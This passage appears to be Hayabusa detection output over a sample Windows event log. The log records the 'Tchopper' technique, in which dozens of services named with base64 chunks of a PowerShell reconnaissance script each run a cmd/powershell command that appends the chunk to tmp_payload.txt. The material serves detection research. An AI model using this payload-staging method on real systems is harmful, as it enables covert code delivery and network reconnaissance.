ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:33.491 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:43.623 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:49.575 
